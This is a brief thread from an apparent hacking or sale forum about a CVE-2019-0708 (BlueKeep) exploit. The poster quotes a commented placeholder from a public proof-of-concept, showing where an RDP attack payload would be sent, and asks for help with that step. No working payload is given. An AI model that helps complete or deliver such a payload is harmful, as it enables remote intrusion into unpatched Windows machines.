Sold Cve-2019-0708 Exploit

Discussion in 'All Other Game Services for Sale - Buy & Sell' started by Hack Forums -, 7/30/19.

Thread Status:
Not open for further replies.
  1. Hack Forums -

    Hack Forums -
    Expand Collapse
    High Risk Status: This user has been flagged as high risk due to one or more reasons

    0   0   0

    Offline
    BlueKeep/bluekeep_poc.py at master Ekultek/BlueKeep GitHub

    Help on this part



    Code
    # As much as I don't condone hacking and breaking into things.
    # If you're going to do it, this is where you would put your payload of types.
    #
    # To do this you would do something along the lines of:
    # -----------------------------------------------------
    # tls.sendall(Packer(
    # "0000000c29fbf017000c2946f8c10800450000100028021a400080060a62c0a83682c0a8002036810d3dc0080022ff5"
    # "cfba05185501400300000a7910000"
    # ).bin_pack())
    # data = tls.recv(1024)
    # print repr(data)
    # -----------------------------------------------------
    # Generating the payloads is hard, especially when alsr is involved with it.
    # Good luck with that, I will not be sharing any of my payloads because i
    # don't feel like watching the world burn yet.
     
    • This user is inactive. Hasn't logged into their account in over 60 days.
Thread Status:
Not open for further replies.